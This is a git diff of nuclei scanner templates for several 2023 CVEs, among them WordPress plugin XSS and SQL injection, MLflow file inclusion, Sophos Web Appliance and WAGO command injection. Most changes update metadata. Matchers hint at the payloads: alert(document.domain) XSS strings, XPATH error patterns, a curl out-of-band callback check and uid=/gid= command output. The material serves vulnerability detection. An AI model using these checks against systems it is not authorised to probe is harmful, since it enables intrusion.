diff --git a/nuclei-templates/CVE-2023/CVE-2023-0948.yaml b/nuclei-templates/CVE-2023/CVE-2023-0948.yaml index 9c9dbd043d..39f153eda8 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0948.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0948.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.5.8. reference: - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718 @@ -17,7 +19,7 @@ info: cve-id: CVE-2023-0948 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29557 + epss-percentile: 0.29003 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +27,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: wpscan,cve,cve2023,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated + tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop http: - raw: 
@@ -47,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "peachpay")' condition: and -# digest: 4a0a0047304502201858079bb4de8ef6c8f924b30d70a5f4ba3f49294bc65779fd13a419f02e7230022100de7cee4a6c861f4b07b8abe2f257bb22d5c67771e88991f3429a0315e6d7dc79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207489300b27fc604ebc086d2dcf53a066f713bf6e155fc3d7e796b5d5e7073f41022100d763b61ecc36c48a60e65fcac863f65fb4d354916e78aef5854c9720707c38f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-0968.yaml b/nuclei-templates/CVE-2023/CVE-2023-0968.yaml index 05fb84a0e8..16ff8ebd50 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-0968.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-0968.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 3.3.9.1. reference: - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595 @@ -18,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65337 + epss-score: 0.00229 + epss-percentile: 0.61047 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -27,7 +29,7 @@ info: vendor: kibokolabs product: watu_quiz framework: wordpress - tags: wordpress,cve,cve2023,wp,wp-plugin,xss,watu,authenticated,wpscan + tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs http: - raw: @@ -49,4 +51,4 @@ http: - 'contains(body_2, "/onmouseover=alert(document.domain)//")' - 'contains(body_2, "Watu Quizzes")' condition: and -# digest: 490a0046304402205b133c8abef7990358984ec39f887631359a20a38dfc16a0778f26f5e77f99f3022047a3fbd4b3294c79db7062fb1931676d27d531915e38cf52cf9165a2966425a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220101a9d9c53b24a7571530b23ae247be38f0e4664af24681277fdacfd89e411ce02206695c9ba4925e33fea75684fa188a7bbe650cbebaa6750343535fa6fa8939a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1020.yaml b/nuclei-templates/CVE-2023/CVE-2023-1020.yaml index 2c47b30d9c..9acbdeec07 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1020.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1020.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1020 cwe-id: CWE-89 - epss-score: 0.09522 - epss-percentile: 0.94153 + epss-score: 0.05497 + epss-percentile: 0.93034 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: vendor: wp_live_chat_shoutbox_project product: wp_live_chat_shoutbox framework: wordpress - tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat + tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project http: - raw: 
@@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f85a10c5106f8eaceb21915c617d41a1a6514e12baaa53bc7b2614230ce974b402203633cb96d4f59ee753e32acd91b5a0a658ea6cb0725008ad1080c4875cd5a6a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fac5c85ebe071ae5ef03e6745f869794a516d4dd1a7fd22f58ec3d490039c84c022100cafea571a15f3be63d57818f9c9386f1433fe77561b33395aeb30cde8b682100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1080.yaml b/nuclei-templates/CVE-2023/CVE-2023-1080.yaml index 835d957e1d..9a7d4ce305 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1080.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1080.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: Fixed in version 1.5.6. reference: - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74 @@ -18,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65337 + epss-score: 0.0025 + epss-percentile: 0.64332 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -27,7 +29,7 @@ info: vendor: gnpublisher product: gn_publisher framework: wordpress - tags: wp-plugin,wordpress,gn-publisher,authenticated,cve2023,wp,xss,wpscan,cve + tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher http: - raw: @@ -49,4 +51,4 @@ http: - 'contains(body_2, "/ onmouseover=alert(document.domain);//")' - 'contains(body_2, "GN Publisher")' condition: and -# digest: 490a0046304402202d097908fcb74259d96d94c9e7d950e2e5b186eb0ac1c4a48c7b772ef3e57bd8022032db25787556e60f21437ab17b7001a749736e4bd9683abece4eeab2ba43520b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e1ffc42fadc2223a2bde2cfca3d21b2ccb40f02c1ccf27a1ded4325da215dfb022100fd1a246c50613256dcd59279b3f0ea4fcde05ce171adfeabd1d5068a35986ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1177.yaml b/nuclei-templates/CVE-2023/CVE-2023-1177.yaml index 295b3dcb68..dd02c9198b 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1177.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1177.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \..\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability. reference: @@ -18,9 +20,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1177 - cwe-id: CWE-22,CWE-29 - epss-score: 0.03046 - epss-percentile: 0.89909 + cwe-id: CWE-29,CWE-22 + epss-score: 0.02668 + epss-percentile: 0.89327 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true 
@@ -28,7 +30,7 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - tags: mlflow,oss,lfi,huntr,cve,cve2023,intrusive + tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: - raw: @@ -66,4 +68,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a00483046022100ddf8c97e69245d99a1004b460686e101756f893719d2d38d810ecc47f1948e44022100bfe69f076c6bfde9828bdcd20e6c8014e0214ccb2f8b626e4d67e807fc18f22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d755ca22bd1d15b3e2037d22374fbe60d7b1db9c35cc6a4cad95e1b57c88d42a022100c8c05dd9d1b11648b906d574c3f74255eabdd64d0283c45bb8dac0ee7c66c3cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1263.yaml b/nuclei-templates/CVE-2023/CVE-2023-1263.yaml index 12fe3593e4..3ff851d678 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1263.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1263.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-1263 cwe-id: CWE-200 - epss-score: 0.00359 - epss-percentile: 0.69106 + epss-score: 0.00238 + epss-percentile: 0.61195 cpe: cpe:2.3:a:niteothemes:coming_soon_\&_maintenance:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: coming_soon_\&_maintenance framework: wordpress publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes http: - raw: 
@@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bbfdf43e7fb447a44df3227095c400e7a521ee867d3285fa7c9a323c4227ef7022100ed6efe7a763c1122ca4ba614bc58f3fffe1924eb85e7218892b9ffae9511b14b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011e5f903b0a93f9e3c06ec147cc8c3f99a9d83b16945cc273a867de1c81ea74e0221009f399c551bcf521294a213c1b973399eb02bea51059fdf559b11acf56aff52ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1362.yaml b/nuclei-templates/CVE-2023/CVE-2023-1362.yaml index c68797d66d..d50e1cf238 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1362.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1362.yaml 
@@ -6,26 +6,29 @@ info: severity: medium description: | This template checks for the presence of clickjacking prevention headers in the HTTP response, aiming to identify vulnerabilities related to the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2. + impact: | + An attacker can trick users into performing unintended actions on the vulnerable application. remediation: | Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-1362 - https://huntr.dev/bounties/e5959166-c8ef-4ada-9bb1-0ff5a9693bac/ - https://github.com/unilogies/bumsys/commit/8c5b27d54707f9805b27ef26ad741f2801e30e1f + - https://github.com/ctflearner/ctflearner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-1362 cwe-id: CWE-1021 - epss-score: 0.00078 - epss-percentile: 0.33055 + epss-score: 0.00421 + epss-percentile: 0.71594 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: bumsys_project product: bumsys - tags: cve,cve2023,bumsys,clickjacking,huntr + tags: cve,cve2023,bumsys,clickjacking,huntr,bumsys_project http: - method: GET @@ -39,4 +42,4 @@ http: - "!regex('X-Frame-Options', header)" - "contains(body, 'BUM
Sys')" condition: and -# digest: 4a0a0047304502202a64abc0a997cdee4087425d5902226ed51600313c789ee9770d42574b9ede8502210085b81e07b93b4bb93010364a14b5bc2f4b56206198d76d85a7413375b15b0dd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db736e1f7e3b60b5cdc1776b06c2485456e5878e8fb3742146e4e593eeaa3f95022100f0fbea2cbfdb563686635b04f3c66d63dc0874d5c884e91e104af6118f8f9deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1408.yaml b/nuclei-templates/CVE-2023/CVE-2023-1408.yaml index ce176bce81..1bef666e4f 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1408.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1408.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-1408 cwe-id: CWE-89 - epss-score: 0.00995 - epss-percentile: 0.81873 + epss-score: 0.01339 + epss-percentile: 0.84615 cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: video_list_manager framework: wordpress publicwww-query: /wp-content/plugins/video-list-manager/ - tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,authenticated + tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project http: - raw: @@ -48,4 +48,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "Edit Video","Youtube")' condition: and -# digest: 490a004630440220084425c156988bb94e19ee4a2832732836bf94a03cd90d6c8beb942dd741621b02203092a21cb4a1032a1ed44cf60b22f542ec879450bd10db5b301d67b43b3ef3a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220557189f3aeda3c74e23c7c2eafca9a9ffd0d874f4c21f4998f0fa7da5b3d34390220535b42e7ed0a6ca565fbab863cb242ca58ab68d291a3470b7e8c5d54ebf0de30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2023/CVE-2023-1434.yaml b/nuclei-templates/CVE-2023/CVE-2023-1434.yaml index ebc2527106..dc69545591 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1434.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1434.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: @@ -18,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: title:"Odoo" - tags: cve,cve2023,odoo,xss + tags: cve2023,cve,odoo,xss http: - method: GET @@ -43,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206aca9c974becbffd46255feaa2ba0db4491e5219a35c0cbc3db40fd20486142d02202661ddbc904295781fbbdea1b323355da660ee9b7a33d68fe758aced5040f602:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009f88c973f15e82b4aad7aedc75098b0daca742aa8b6fe3cfb11e203d2306539b022050fd604d6227ce671990eaac0780f3c69d00cd07567190bf96d24b10177fddb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1454.yaml b/nuclei-templates/CVE-2023/CVE-2023-1454.yaml index 287aa5fbb9..475f7f3a27 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1454.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1454.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor. reference: @@ -13,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-1454 - https://vuldb.com/?ctiid.223299 - https://vuldb.com/?id.223299 + - https://github.com/Awrrays/FrameVul classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1454 cwe-id: CWE-89 - epss-score: 0.0391 - epss-percentile: 0.91024 + epss-score: 0.04509 + epss-percentile: 0.92282 cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,7 +30,7 @@ info: vendor: jeecg product: jeecg-boot shodan-query: http.favicon.hash:1380908726 - tags: cve,cve2023,jeecg,sqli + tags: cve2023,cve,jeecg,sqli http: - raw: @@ -64,5 +67,4 @@ http: - "XPATH syntax error: '([a-z- @%]+)'" - "XPATH syntax error: '([a-z@%0-9.]+)'" part: body - -# digest: 4a0a0047304502200085a9768ebb8df398eb82e7fddaa356141db81e8dfd26e12c89f6248d514773022100d372347570c6bd81b5e86b9de313568b7b2671a7099429e9eb906ac7ff4e3657:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201617c97220bd0ac605e36efc6731e6e680ab819a2d613804423de883aba8d1eb0220562bcbd34db0c1ce70cd835193e6819e76e7cef2925feda6621420165482860b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1496.yaml b/nuclei-templates/CVE-2023/CVE-2023-1496.yaml index 59db7d1325..ea5d2f901e 100644 
--- a/nuclei-templates/CVE-2023/CVE-2023-1496.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1496.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability. reference: @@ -15,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-1496 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.32217 + epss-score: 0.00085 + epss-percentile: 0.34963 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: evilmartians product: imgproxy shodan-query: "Server: imgproxy" - tags: huntr,cve,cve2023,imgproxy,xss,svg + tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians http: - method: GET @@ -42,4 +44,4 @@ http: - type: dsl dsl: - content_security_policy -# digest: 4a0a00473045022100c34ab8bbd6b6f0f52064e9f9fdf393ad934a05eba16ac9b9b536123f3d3d9f7f022061b59faf3bc8e22ddf3c484d3357c4a0a2d84f97af4395446a6f7848dc73803a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ad789f0ac262a3012d88a82fabcb0495918466b6945c80a40a9cf0f17501756022100fcd6b4965a63afc6ed0a5933664366f832ca12cc04bd2e4809dbd1fec88dc51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1546.yaml b/nuclei-templates/CVE-2023/CVE-2023-1546.yaml index 96c55bacd1..9197a040a0 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1546.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1546.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.124 reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 @@ -16,7 +18,7 @@ info: cve-id: CVE-2023-1546 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29531 + epss-percentile: 0.29221 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: plainviewplugins product: mycryptocheckout framework: wordpress - tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated + tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins http: - raw: @@ -46,4 +48,4 @@ http: - 'contains(body_2, "scriptalert(/XSS/)/script")' - 'contains(body_2, "mycryptocheckout")' condition: and -# digest: 490a004630440220376d49479e10434de442d31e8988e8b4fd4b748f0230ae086de68653daa91a39022034d3d5ee3ed2e1ae5e49fe9ee7889be3e4af429094d413aa0214b379e92fc3ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018d8d859d1510e71d41e4dcab2713a5820907e67c0445dd0ecdb4500c0fa6b730220327729b1610301143ba6cbd8037ecece03bc57e6fcd4ce7118478ec6102d864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1671.yaml b/nuclei-templates/CVE-2023/CVE-2023-1671.yaml index e99c694c22..b2c83a3a55 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1671.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1671.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-1671 - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce + - https://github.com/lions2012/Penetration_Testing_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1671 cwe-id: CWE-77 - epss-score: 0.9526 - epss-percentile: 0.99153 + epss-score: 0.96156 + epss-percentile: 0.99469 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +31,7 @@ info: product: web_appliance shodan-query: title:"Sophos Web Appliance" fofa-query: title="Sophos Web Appliance" - tags: packetstorm,cve,cve2023,rce,sophos,oast,kev + tags: cve2023,cve,packetstorm,rce,sophos,oast,kev http: - raw: @@ -50,4 +53,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4b0a004830460221008b3de2245abaa1a66fa96e677ebe4921d18423135ac95464ab9aae76bd1b2e0a022100e658b0a2211db0334aa3b350b968648077623dff6a01b394635fcf250f884da9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae0e465ec75fd0a4861424e3aad7f02640cf6221038527efafe82c6742e6737002206c97e80f7b304f7c6b2617847d8a6c3bc6133ac27161b8921c0781f00317ca0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1698.yaml b/nuclei-templates/CVE-2023/CVE-2023-1698.yaml index 93615d66d1..905690f7d5 100644 
--- a/nuclei-templates/CVE-2023/CVE-2023-1698.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1698.yaml @@ -1,23 +1,35 @@ id: CVE-2023-1698 info: - name: WAGO - Unauthenticated Remote Command Execution + name: WAGO - Remote Command Execution author: xianke - severity: high + severity: critical description: | - In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise. + In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. + remediation: | + Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1698 + - https://cert.vde.com/en/advisories/VDE-2023-007/ + - https://github.com/codeb0ss/CVE-2023-1698-PoC + - https://github.com/deIndra/CVE-2023-1698 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1698 cwe-id: CWE-78 + epss-score: 0.55051 + epss-percentile: 0.97591 + cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"WAGO" - tags: cve,cve2023,wago,rce,unauth + vendor: wago + product: compact_controller_100_firmware + shodan-query: html:"/wbm/" html:"wago" + tags: cve2023,cve,wago,rce http: - raw: 
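Review bot: The rewritten `tags` line drops `unauth` even though the description on the same hunk still says "an unauthenticated, remote attacker" and the CVSS vector carries PR:N, so the template silently disappears from `-tags unauth` runs. Keep the tag, `tags: cve2023,cve,wago,rce,unauth`, or, if the drop is deliberate, say why in the description. The name loses the "Unauthenticated" qualifier in the same hunk; the two edits should agree with each other and with the vector. The `http` raw request body continues outside this hunk.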
@@ -34,10 +46,12 @@ http: part: body words: - '"license":' - - '"package":' - - 'uid' + - '"name":' + - 'uid=' + - 'gid=' condition: and - type: status status: - 200 +# digest: 4a0a00473045022100b407d13bb092bfd293626f93b9765b760fc504f78be29190689950f60041a7bf02200e23d21826874028db946e7c4a4af5e0b05de0bed54232eb4b63c39eb70fe3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1719.yaml b/nuclei-templates/CVE-2023/CVE-2023-1719.yaml index 619a5a5367..7dff6c4314 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1719.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1719.yaml @@ -9,13 +9,14 @@ info: reference: - https://starlabs.sg/advisories/23/23-1719/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1719 + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1719 cwe-id: CWE-665 epss-score: 0.02807 - epss-percentile: 0.89556 + epss-percentile: 0.90415 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true @@ -23,7 +24,7 @@ info: vendor: bitrix24 product: bitrix24 shodan-query: html:"/bitrix/" - tags: cve,cve2023,bitrix,xss + tags: cve2023,cve,bitrix,xss,bitrix24 http: - method: GET @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb04484a460f848e68410a7d470fb6cf254b2ae3b1d9e88454dbe51f4f661dfe02204a2f5155cd0ba253a3d78e4bf73c0f04d7e1e12b07b46fd68a11bea541995f5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1730.yaml b/nuclei-templates/CVE-2023/CVE-2023-1730.yaml index 6d5f2912c7..cdb9c8fcc3 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1730.yaml 
